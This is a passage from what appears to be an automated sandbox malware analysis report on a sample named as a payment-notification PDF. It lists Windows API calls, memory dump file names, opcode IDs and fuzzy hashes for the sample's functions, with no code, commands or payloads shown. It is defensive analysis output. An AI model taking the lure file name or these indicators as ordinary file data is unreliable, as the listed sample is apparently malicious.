                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4241681289-0
                                                                                                                              • Opcode ID: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                              • Instruction ID: 66738fc5919b7c3a3c7c4a311c48fd84e22d6c2a66b6279363cc5d51ef299119
                                                                                                                              • Opcode Fuzzy Hash: b9dd60fc789600814193b10c203562de5ce45e1fa765f6932a0e1556b25623f2
                                                                                                                              • Instruction Fuzzy Hash: 832180B6500118AFDB11CF90CD85EEEB379EB8C700F10459AFA0997150DA75AA85CBA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID: [B
                                                                                                                              • API String ID: 1279760036-632041663
                                                                                                                              • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                              • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1358664141-0
                                                                                                                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2880819207-0
                                                                                                                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 357397906-0
                                                                                                                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3349847261-0
                                                                                                                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2223660684-0
                                                                                                                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                              • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                              • EndPath.GDI32(?), ref: 00447336
                                                                                                                              • StrokePath.GDI32(?), ref: 00447344
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2783949968-0
                                                                                                                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2710830443-0
                                                                                                                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 146765662-0
                                                                                                                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                              APIs
                                                                                                                              • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                              • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                              APIs
                                                                                                                              • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                              • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2889604237-0
                                                                                                                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                              APIs
                                                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileName$OpenSave
                                                                                                                              • String ID: X
                                                                                                                              • API String ID: 3924019920-3081909835
                                                                                                                              • Opcode ID: 8eed714b24dc3ca166b04bfeb77d9567fb25e86b9125e0bc35cf5eaba171f34f
                                                                                                                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                              • Opcode Fuzzy Hash: 8eed714b24dc3ca166b04bfeb77d9567fb25e86b9125e0bc35cf5eaba171f34f
                                                                                                                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                              APIs
                                                                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
